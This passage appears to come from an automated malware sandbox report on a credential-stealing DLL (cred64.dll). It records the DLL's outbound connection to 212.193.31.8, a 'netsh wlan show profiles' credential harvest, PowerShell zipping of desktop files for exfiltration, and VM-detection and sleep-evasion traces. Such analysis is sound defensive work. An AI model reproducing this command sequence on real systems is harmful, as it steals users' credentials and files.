    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8764
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 839
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8845
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 771
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7444
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1624
    Source: C:\Windows\System32\loaddll64.exe TID: 6628 Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144 Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320 Thread sleep count: 8845 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 Thread sleep count: 771 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4340 Thread sleep time: -6456360425798339s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7040 Thread sleep time: -3689348814741908s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340 Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
    Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini
    Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602CEB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWPG
    Source: rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
    Source: rundll32.exe, 00000003.00000002.2312179824.000001D602D1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA519C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA5108000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2312083818.000001CFA51C5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: rundll32.exe, 0000000A.00000002.2388934623.0000023142F98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: netsh.exe, 00000005.00000003.1718017743.0000019CC3315000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUUO
    Source: netsh.exe, 0000000C.00000003.1775934945.0000027292B14000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: netsh.exe, 00000006.00000003.1718018963.00000210077E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\System32\rundll32.exe Network Connect: 212.193.31.8 80
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
    Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
    Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
    Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN.docx VolumeInformation
    Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformation
    Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.xlsx VolumeInformation
    Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\WUTJSCBCFX.xlsx VolumeInformation
    Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation
    Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
